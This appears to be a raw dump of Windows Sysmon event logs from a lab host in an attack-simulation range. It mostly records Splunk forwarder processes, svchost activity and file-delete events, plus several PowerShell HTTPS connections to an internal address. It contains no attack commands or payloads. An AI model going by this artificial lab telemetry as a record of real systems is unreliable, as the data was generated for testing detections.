Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.840{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E8C-613A-4690-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.826{B81B27B7-4E8C-613A-4690-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C4C2C7909451A41A77A7D8DB9625831,SHA256=E13725489E4D05066FD8E3267BA882FCBB651201FD7A594501F0E6A3C69DA9CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.424{B81B27B7-4E8C-613A-4590-03000000C801}39486740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E8C-613A-4590-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E8C-613A-4590-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E8C-613A-4590-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.241{B81B27B7-4E8C-613A-4590-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:29.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C95F5057641962059E1841CB13140E20,SHA256=29B31EF52D08D4C4B49E7EF01B491FE4FF017DF5414F07D56EC04E2B9C27C0F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:29.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C50C4CEAADFE6D1ECB0D4B4430D750B,SHA256=1D0EC171A1117731FCC73A665EFFB9D6A4906E06C0C5A8537E82382F134F7EAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:29.246{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5991EBACD7F2DA81F79988389B73CF44,SHA256=B0FAF12D308B7CFB93789E64EF32705BAFC8EB27FBCB73B580C0AC1D4919B292,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:30.479{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF2BC3FB78E03905272205BA53315F1F,SHA256=54658B551B677F09A1DFBDD359E748A53352282B4E8FD9704CC5A0DE5E79F7F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:31.542{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D773BBEDEB5D8584ABC33123B301953,SHA256=D94892059267B7F3087935119A4AA9D004CC0C8319DF3024BAF39A2C734E0418,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:31.325{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=87D8A09CB8049725F5826F3AF9DA357F,SHA256=735F522A4D16C3693F811DB2B725230A9BC8337E177B09CB959B5EB7354CCE68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:32.843{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:32.842{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:32.842{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:32.547{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79BFB572C47DFE1234939B20FB97D36E,SHA256=E2DF2770E2B7EA060F6FB89CAF96BB38C6200280CDDC28FD94FA4985D52C7B58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:56.247{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56648-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:56.115{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56647-false10.0.1.12-8000- 23542300x800000000000000035084766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:33.578{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8731F255FF9A4A59D6FC77B7DDC7D0DA,SHA256=0279BEF45EAAAB9CD2E00DA1BBFF1B4E03FDA8C9C712330CF36A4761C224E656,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:34.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41583AD5AF5148C811B001086C3E1ED1,SHA256=761DEB7BE1A85078CACB967A502F7398E43764D32220969A406AE4D5C572C95A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:35.639{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4C80DE6E4576A285302C0FAE61642B3,SHA256=68DA94D83B56C773CAFE0320A5EF3B2E0CD0AAD567AB18BAF6C0472EEE2DD24E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:36.659{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3767A296A8CB9C7D40D8A60A41B328F8,SHA256=F570D49720F52CC607A933177457C54978994B201B38D41E91544644B44039B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:36.406{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3611BC73FF35DD68DCF0FAE874B57B81,SHA256=2A6095F5DA212D23D684FACA0AC081AE4BC631877A020FAE99B7F6A9FFB48120,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:36.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F85BFE129494E6F0AD77FAF7EF698121,SHA256=6B0D42AADD0AA10DAF40DADEC86E3FAED814164CAAB7917520BC1D74A0825B63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:37.673{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE1D97EFCD634EAB66A1EE146923661,SHA256=0C0C22AAFAE83376753A264E8652C73D771653A71D4F4E9C1A33E03EC97D902F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:01.259{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56649-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:38.687{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40FD62F99DC29592B54CFF175383C596,SHA256=1DFCB691005763F36A9E28B05D8C2DF8C508F8C782AAB794E33CBA53285C2682,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:02.157{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56650-false10.0.1.12-8000- 23542300x800000000000000035084776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:39.718{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27E97B7593C1D333525AA79A637BE3F,SHA256=2CA9A9896D969CFE30BECF3AC639C6310E11E7E0F81706C183637FE9CF0FE5B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:40.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D12CFE7CD5552858217D499147093940,SHA256=96AD8F657C791BF9C94D5C05AD066CA344B3AB02AD51274604BF39D5FC08CD47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:41.759{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45552B0421B7C01B6A66C0211F7F4E04,SHA256=CD4B8CA2DBCB86DAFBF5EA95090327C0EA9759CF0A420768D25A3B6B2F099949,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:41.474{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=013580EA2B766CA3EAF2019F5C938730,SHA256=0F13704FB0BD3ACBAE229329F9949B79A0FC5E040674C7AE281CF61D15E16B11,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:42.805{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7521C8748DE25162E8CD09858420BB,SHA256=28E6AB5CAAE5B26A4B8D269555A7AE45C8473B8258396468B74DA966577CCF87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 